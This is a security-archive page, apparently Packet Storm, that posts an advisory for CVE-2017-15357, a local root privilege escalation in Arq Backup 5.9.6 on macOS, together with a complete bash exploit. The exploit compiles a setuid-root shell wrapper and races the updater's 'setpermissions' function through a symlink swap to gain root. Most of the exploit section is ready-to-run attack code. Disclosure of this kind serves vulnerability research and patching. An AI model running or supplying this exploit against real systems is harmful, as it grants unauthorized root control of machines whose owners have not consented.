Twenty Year Anniversary

Arq Backup 5.9.6 Local Root Privilege Escalation

Arq Backup 5.9.6 Local Root Privilege Escalation
Posted Dec 4, 2017
Authored by Mark Wadham

Arq Backup versions 5.9.6 and below suffer from a local root privilege escalation vulnerability.

tags | exploit, local, root
advisories | CVE-2017-15357
MD5 | 2cf34b399d49d64d0321379e8239a52e

Arq Backup 5.9.6 Local Root Privilege Escalation

Change Mirror Download
Arq Backup from Haystack Software is a great application for backing up macs and
windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
vulnerable to a local root privilege escalation exploit.

The updater binary has a "setpermissions" function which sets the suid bit and
root ownership on itself but it suffers from a race condition that allows you to
swap the destination for these privileges using a symlink.

We can exploit this to get +s and root ownership on any arbitrary binary.

Other binaries in the application also suffer from the same issue.

This was fixed in Arq 5.9.7.

https://m4.rkw.io/arq_5.9.6.sh.txt
49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
------------------------------------------------------------------------------
#!/bin/bash

##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ####
##################################################################

vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`

cwd="`pwd`"

if [ "$vuln" == "" ] ; then
echo "Not vulnerable - auto-updates not enabled."
exit 1
fi

cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl(
"/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
NULL
);
return 0;
}
EOF

gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c

ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater

./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater

i=0
timeout=10

while :
do
r=`ls -la ./arq_updater |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq $timeout ] ; then
rm -f ./arq_updater
echo "Not vulnerable"
exit 1
fi
done

./arq_updater

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    10 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close